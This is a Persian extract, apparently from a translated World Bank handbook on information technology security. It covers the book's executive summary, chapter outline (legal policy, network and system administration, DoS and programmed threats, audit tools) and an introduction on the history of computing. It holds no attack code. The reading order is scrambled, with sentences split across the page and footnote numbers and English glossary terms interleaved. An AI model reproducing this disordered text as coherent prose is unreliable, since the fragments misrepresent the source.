‫ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻮﺳﻂ ﺁﻧﻬﺎ( ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫﺎ )ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺍﻃﻼﻋـﺎﺕ ﺑـﻲﻧﻘـﺺ ﻭ ﺻـﺤﻴﺢ ﺑـﺎﻗﻲﺧﻮﺍﻫﻨـﺪ ﻣﺎﻧـﺪ(‬
‫ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ؛‬
‫•‬
‫ﻣﻔﺎﻫﻴﻢ ﺳﻨﺘﻲ ﻛﻪ ﺑﻪ ﻧﺤﻮﻱ ﺑـﻪ ﻗﺎﻟـﺐ ﻗـﻮﺍﻧﻴﻦ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻣﻨﺘﻘﻞ ﺷﺪﻩﺍﻧﺪ؛‬
‫•‬
‫ﻗﻮﺍﻧﻴﻦ‪ ،‬ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺑﺮ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻋﺮﺻﺔ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ‪ ،‬ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺨﺼﻲ‪ ،‬ﻭ ﭼﺎﺭﭼﻮﺑﻬـﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ؛ ﻭ‬
‫•‬
‫ﺭﻭﺍﻟﻬــﺎﻳﻲ ﺑــﺮﺍﻱ ﺷﻨﺎﺳــﺎﻳﻲ‪ ،٢٠‬ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ‪ ،‬ﻭ ﺗﺄﻳﻴــﺪ‬
‫ﺍﻋﺘﺒﺎﺭ‪ ٢١‬ﻛﺎﺭﺑﺮﺍﻥ؛‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳـﺞ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺍﺋـﻪ‬
‫ﺧـــﺪﻣﺎﺕ ﺍﻃﻼﻋـــﺎﺗﻲ ﺑﻜـــﺎﺭ ﻣـــﻲﺭﻭﻧـــﺪ ﻭ ﺗﻨﻈﻴﻤـــﺎﺕ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ‪ ٢٢‬ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻣﺴﺎﺋﻞ؛‬
‫•‬
‫ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﻗـﻮﺍﻧﻴﻦ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﻭ‬
‫ﻣﺮﺍﺟﻊ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻣﻌﺘﺒﺮ؛‬
‫•‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺣﻘﻮﻗﻲ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻛـﻼﻥ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨـﺪ‪ .‬ﺑﺨـﺶ ﭘـﻨﺠﻢ ﻧﮕـﺎﻫﻲ ﻋﻤﻴﻘﺘـﺮ ﺑـﻪ ﻟـﻮﺍﺯﻡ ﻭ‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻓﻨﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺩﺍﺭﺩ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺯ ﺑﻌﺪ ﺳﺨﺖ ﺍﻓـﺰﺍﺭﻱ )ﻣﻮﺩﻣﻬـﺎ‪ ،‬ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ‪ ٢٣‬ﻭ‬
‫•‬
‫‪١٨‬‬
‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ ﺑﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺷﺒﻜﻪ ﻭ ﺳﻴﺴﺘﻢ ﻛﻤـﻚ ﻣـﻲﻛﻨـﺪ ﺗـﺎ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﻭﻇﺎﻳﻒ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﻛﺎﺭﺁﻣﺪﺗﺮﻱ ﺍﻧﺠـﺎﻡ ﺩﻫﻨـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺑﺨﺶ ﻣﺴﺎﺋﻠﻲ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺎﻳـﺪ ﺩﺭ ﺳـﻄﻮﺡ ﻓﻨـﻲ ﻭ‬
‫ﻼ ﺍﻳﻨﻜﻪ ﺿﻮﺍﺑﻂ ﺍﻣﻨﻴﺘﻲ ﭼﮕﻮﻧﻪ ﻧﻘـﺾ‬
‫ﻣﺪﻳﺮﻳﺘﻲ ﺩﺭﻙ ﺷﻮﻧﺪ؛ ﻣﺜ ﹰ‬
‫ﻣﻲﺷﻮﻧﺪ ﻭ ﻳﺎ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﻬﺪﻳـﺪﺍﺕ ﻛﺪﺍﻣﻨـﺪ‪ .‬ﺑﺨـﺸﻬﺎﻱ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ( ﻭ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ )ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺷـﺒﻜﻪﺍﻱ ﻣﻮﺟـﻮﺩ‬
‫ﺭﻭﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺖ؛ ﻣﺜﻞ ‪(TCP/IP‬؛‬
‫•‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﺑـﻪ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ‬
‫ﻛﺎﺭﻱ‪ ٢٤‬ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ‬
‫)‪ ٢٥(DoS‬ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﻩ‪ ٢٦‬ﻣﻲﮔﻮﻳﻨﺪ‪.‬‬
‫‪Best Practices‬‬
‫‪Data Confidentiality‬‬
‫‪Data Integrity‬‬
‫‪Identification‬‬
‫‪Authorization‬‬
‫‪Servers‬‬
‫‪Routers‬‬
‫‪17‬‬
‫‪18‬‬
‫‪19‬‬
‫‪20‬‬
‫‪21‬‬
‫‪22‬‬
‫‪23‬‬
‫‪٢٣‬‬
‫ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ‬
‫•‬
‫ﭼﮕــﻮﻧﮕﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻣﻤﻴــﺰﻱ‪ ٢٧‬ﻭ ﻭﺭﻭﺩ ﺑــﻪ‬
‫ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺳﻴﺐﭘـﺬﻳﺮ‬
‫ﻭ ﻳﺎﻓﺘﻦ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ ﺭﻭﻱ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ‬
‫ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫•‬
‫ﺗﻮﺻﻴﻪﻫﺎﻱ ﻓﻨﻲ ﻭﻳـﮋﻩ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢ ﻋﺎﻣﻠﻬـﺎﻱ ‪،Unix‬‬
‫‪ ،Windows ،Linux‬ﻭ ‪Macintosh‬‬
‫ﺑﻪ ﺩﻟﻴﻞ ﺣﺠﻢ ﻭ ﭘﻴﭽﻴﺪﮔﻲ ﻣﻮﺿـﻮﻉ‪ ،‬ﭼﻨـﺪﻳﻦ ﺿـﻤﻴﻤﻪ ﻧﻴـﺰ ﺩﺭ‬
‫ﺍﻧﺘﻬﺎﻱ ﻛﺘﺎﺏ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﭘﻴﻮﺳﺖ ‪ ۱‬ﺣﺎﻭﻱ ﻭﺍﮊﻩﻧﺎﻣﻪﺍﻱ ﺍﺯ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺠﻲ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﻭ ﭘﻴﻮﺳﺘﻬﺎﻱ ‪ ۲‬ﺗﺎ ‪ ۵‬ﻧﻴﺰ ﻣﺮﺍﺟﻊ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴﻪ‬
‫ﻭ ﺗﺪﻭﻳﻦ ﻛﺘﺎﺏ ﺭﺍ ﻣﻌﺮﻓﻲ ﻧﻤﻮﺩﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺷﺎﻣﻞ ﻣـﺴﺘﻨﺪﺍﺕ‬
‫ﭼﺎﭘﻲ‪ ،‬ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭﺑﺎﺭﺓ‬
‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﻫﺴﺘﻨﺪ‪ .‬ﺗﻮﺻـﻴﻪ ﻣـﻲﺷـﻮﺩ‬
‫ﺗﻤﺎﻣﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺑﻪ ﻣﺮﺍﺟﻌﻲ ﻛﻪ ﺩﺭ ﺑﺨﺶ ﻣﻨﺎﺑﻊ ﻭ ﻣﺂﺧﺬ ﺫﻛـﺮ‬
‫ﺷﺪﻩﺍﻧﺪ ﺳﺮﻱ ﺑﺰﻧﻨﺪ‪.‬‬
‫ﮔﺎﻣﻬﺎﻱ ﺁﺗﻲ ﻭ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ‬
‫ﻣــﻲﻛﻨــﺪ‪ .‬ﺍﻳــﻦ ﻛﺘــﺎﺏ ﻫﻤﭽﻨــﻴﻦ ﺷــﺎﻣﻞ ﻣﺮﺍﺟــﻊ ﻓﺮﺍﻭﺍﻧــﻲ ﺍﺯ‬
‫ﻣﻮﺿﻮﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺍﺑﻌﺎﺩ ﺩﻳﮕﺮ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ‬
‫ﭘﻮﺷﺶ ﻣﻲﺩﻫﻨﺪ ﻭ ﻟﺬﺍ ﺁﻣﻮﺧﺘﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ‪ ،‬ﮔـﺎﻣﻲ ﺩﺭ ﺟﻬـﺖ‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﻮﻟﻴﺪ ﻇﺮﻓﻴﺖ ﺩﺭ ﺳﻄﺢ ﻣﺤﻠﻲ ﺩﺭ ﺟﻬـﺎﻥ ﺭﻭ‬
‫ﺑﻪ ﮔﺴﺘﺮﺵ ﺍﻣﺮﻭﺯ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪ .‬ﺍﻳﻦ ﻛﺘـﺎﺏ ﺗﻮﺳـﻂ ﺑﺎﻧـﻚ‬
‫ﺟﻬﺎﻧﻲ ﻣﻨﺘﺸﺮ ﺷـﺪﻩ ﻭ ﺩﻳـﺴﻚ ﻓـﺸﺮﺩﻩ ﻭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺁﻥ ﻛـﻪ‬
‫ﺣــﺎﻭﻱ ﻣﻄﺎﻟــﺐ ﺟﺪﻳــﺪ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﺍﺳــﺖ ﻧﻴــﺰ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ‬
‫ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺍﻭﻟـﻴﻦ ﻭﻳـﺮﺍﻳﺶ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ‬
‫ﺍﺟﻼﺱ ﺟﻬﺎﻧﻲ ﺳـﺮﺍﻥ ﺟﺎﻣﻌـﺔ ﺍﻃﻼﻋـﺎﺗﻲ )‪ (WSIS‬ﺩﺭ ﮊﻧـﻮ ﺩﺭ‬
‫ﺩﺳﺎﻣﺒﺮ ‪ ۲۰۰۳‬ﻣﻴﻼﺩﻱ ﺍﺭﺍﺋﻪ ﺷﺪ‪.‬‬
‫ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻃﺒﻖ ﻣﻨﺸﻮﺭ ﺣﻖ ﺗﻜﺜﻴﺮ ﺟﻬﺎﻧﻲ‪ ٢٨‬ﻣﺎﻳﻞ ﺑـﻪ ﺣﻔـﻆ‬
‫ﻗــﺎﻧﻮﻥ ﺣــﻖ ﺗﻜﺜﻴــﺮ ﺍﻳــﻦ ﻛﺘــﺎﺏ ﺍﺳــﺖ ﻭ ﺑــﻪ ﻫــﻴﭻ ﻋﻨــﻮﺍﻥ‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺗﺤﻘﻴﻖ‪ ،‬ﺁﻣﻮﺯﺵ ﻭ ﺩﻳﮕﺮ‬
‫ﺍﻫﺪﺍﻑ ﺟﺰ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﺔ ﻋـﻀﻮ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ‬
‫ﻣﺠﺎﺯ ﻧﻤﻲﺑﺎﺷﺪ‪ .‬ﻳﺎﻓﺘﻪﻫﺎ‪ ،‬ﺗﻔﺎﺳﻴﺮ ﻭ ﻧﺘﺎﻳﺞ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬
‫ﻫﻤﮕﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻧﺒﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺑﺎﻧـﻚ‬
‫ﺟﻬﺎﻧﻲ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺁﻥ‪ ،‬ﺍﻋﻀﺎﻱ ﻫﻴـﺄﺕ ﻣـﺪﻳﺮﻩ ﻭ ﻳـﺎ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﻧﺴﺒﺖ ﺩﺍﺩ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ‬
‫ﻛﻪ ﺗﺄﺛﻴﺮ ﻋﻤﺪﺓ ﺁﻧﻬﺎ ﺩﺭ ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ‪ ،‬ﺑﻬﺪﺍﺷﺖ‪ ،‬ﺗﺠـﺎﺭﺕ ﻭ‬
‫ﺩﻳﮕﺮ ﺑﺨﺸﻬﺎﻱ ﺟﺎﻣﻌﻪ ﻧﻤﺎﻳﺎﻥ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ‬
‫ﻛﺸﻮﺭﻫﺎ ﻭ ﻣﺮﺩﻡ ﻣﻔﻴﺪ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺬﺍﺑﻴﺖ ﺧﺎﺻﻲ ﺑـﺮﺍﻱ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﻛﻤﻚ ﻛﻨـﺪ ﺗـﺎ‬
‫ﺍﻧﺴﺠﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳـﻤﺖ ﺟﺎﻣﻌـﺔ ﺍﻗﺘـﺼﺎﺩﻱ ﺟﻬـﺎﻧﻲ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺩﻫﻨﺪ؛ ﻭﻟﻲ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎ ﻫﺰﻳﻨـﺔ‬
‫ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ‪ .‬ﺳــﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﻣــﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﻭ ﺍﻃﻤﻴﻨــﺎﻥ ﻭ‬
‫ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‪ ،‬ﺑﺴﺘﮕﻲ ﺑﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻦ‬
‫ﻭ ﻛﺎﺭﺁﻣﺪ ﻓﻨﺎﻭﺭﻱ ﻭ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺩﺍﺭﺩ‪ .‬ﺩﻭﻟﺘﻬﺎ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ‬
‫ﺧﺎﻧﮕﻲ ﻫﻤﮕـﻲ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪﻫـﺎ ﻭ ﺳـﺮﻣﺎﻳﻪﻫـﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﺁﻧﻬﺎ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ ﻛﺘـﺎﺏ‬
‫ﺣﺎﻭﻱ ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩ ﻫـﺎﻱ ﺭﺍﻳـﺞ ﻭ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺳــﺮﺁﻣﺪﻱ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ﺍﺳــﺖ ﻛــﻪ ﺑــﻪ ﺧﻮﺍﻧﻨــﺪﮔﺎﻥ ﺩﺭ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ‪ -‬ﺑـﺮ ﺣـﺴﺐ ﺷـﺮﺍﻳﻂ ‪ -‬ﻛﻤـﻚ‬
‫‪Workstation‬‬
‫‪Denial of Service‬‬
‫‪Programmed Threats‬‬
‫‪Auditing Tools‬‬
‫‪24‬‬
‫‪25‬‬
‫‪26‬‬
‫‪27‬‬
‫‪Universal Copyright Convention‬‬
‫‪28‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﻣﻘﺪﻣﻪ‬
‫ﻇﻬﻮﺭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻳﻜﻲ ﺍﺯ ﺑﺎﺭﺯﺗﺮﻳﻦ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺩﺭ ﻧﻴﻢﻗﺮﻥ ﺍﺧﻴﺮ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺁﻳﺪ ﻛـﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻛﻨـﻮﻧﻲ ﺑـﺸﺮ‬
‫ﺑﺼﻮﺭﺕ ﻋﺎﻣﻠﻲ ﺣﻴﺎﺗﻲ ﺩﺭﺁﻣﺪﻩ ﺍﺳﺖ‪ ١.‬ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺍﻳـﻦ‬
‫ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻗﺎﻟﺐ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺗﺠﻠـﻲ ﻛـﺮﺩﻩ ﻭ ﺑـﻪ‬
‫ﺍﺑﺰﺍﺭﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﻭ ﺭﻓﻊ ﻧﻴﺎﺯﻫﺎﻱ ﺷﺨﺼﻲ ﺗﺒـﺪﻳﻞ‬
‫ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۵۱‬ﻣـﻴﻼﺩﻱ ﺯﻣﺎﻧﻴﻜـﻪ ﺍﻭﻟـﻴﻦ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺩﻳﺠﻴﺘﺎﻝ ﺗﺠﺎﺭﻱ ﻣﻮﺳﻮﻡ ﺑﻪ ‪ UNIVAC I‬ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺁﻣـﺎﺭ ﻭ‬
‫ﺳﺮﺷﻤﺎﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺁﻣﺮﻳﻜﺎ‪ ٢‬ﺗﺤﻮﻳﻞ ﺩﺍﺩﻩ ﺷﺪ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻣﺮﺩﻡ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭼﻴﺰﻱ ﻧﻤﻲﺩﺍﻧﺴﺘﻨﺪ ﻭ ﺁﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧﻴـﺰ‬
‫ﺗﻨﻬﺎ ﺩﺭ ﺗﻌﺪﺍﺩ ﺍﻧﮕﺸﺖ ﺷﻤﺎﺭﻱ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﺁﺯﻣﺎﻳـﺸﮕﺎﻫﻬﺎﻱ‬
‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺰﺭﮒ‪ ،‬ﮔﺮﺍﻥ‬
‫ﻭ ﻣﻤﻠﻮ ﺍﺯ ﺍﺷﻜﺎﻝ ﺑﻮﺩﻧﺪ‪ .‬ﺩﺭ ﻣﻘﺎﺑﻞ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻧﺪﺍﺯﻩﺍﻱ‬
‫ﻧﺴﺒﺘﹰﺎ ﻛﻮﭼﻚ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﺭﺯﺍﻥ ﻭ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺸﻮﺭﻱ ﻳﺎﻓﺖ‪.‬‬
‫ﺑــﻪ ﻓﺎﺻــﻠﺔ ﻛﻮﺗــﺎﻫﻲ ﭘــﺲ ﺍﺯ ﺭﻭﺍﺝ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﺩﺭ ﺩﺍﻧــﺸﮕﺎﻫﻬﺎ‪،‬‬
‫ﭘﺮﻭﮊﻩﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺑﺮﺍﻱ ﻣﺮﺗﺒﻂ ﺳﺎﺧﺘﻦ ﺁﻧﻬﺎ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ‬
‫ﻧﺤﻮﻱ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﺒﺎﺩﻟﺔ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺟـﻮﺩ ﺁﻳـﺪ ﺁﻏـﺎﺯ‬
‫ﺷــﺪﻧﺪ‪ .‬ﺍﺯ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﭘــﺮﻭﮊﻩﻫــﺎ‪ ،‬ﭘــﺮﻭﮊﺓ ﺗﻮﺳــﻌﺔ ﺷــﺒﻜﺔ‬
‫‪ ARPANET‬ﻣﻮﻓﻘﻴﺖ ﺑﻴﺸﺘﺮﻱ ﻛﺴﺐ ﻛﺮﺩ ﻭ ﺑـﻪ ﺁﻥ ﭼﻴـﺰﻱ‬
‫ﺗﺒﺪﻳﻞ ﺷﺪ ﻛﻪ ﺍﻣﺮﻭﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ "ﺍﻳﻨﺘﺮﻧﺖ" ﻣﻲﺷﻨﺎﺳﻴﻢ ﻭ ﺩﺭﺣﺎﻝ‬
‫ﺣﺎﺿﺮ ﺑﻴﺶ ﺍﺯ ‪ ۳۰۰‬ﻣﻴﻠﻴﻮﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑـﻪ ﻫـﻢ‬
‫ﻣﺮﺗﺒﻂ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
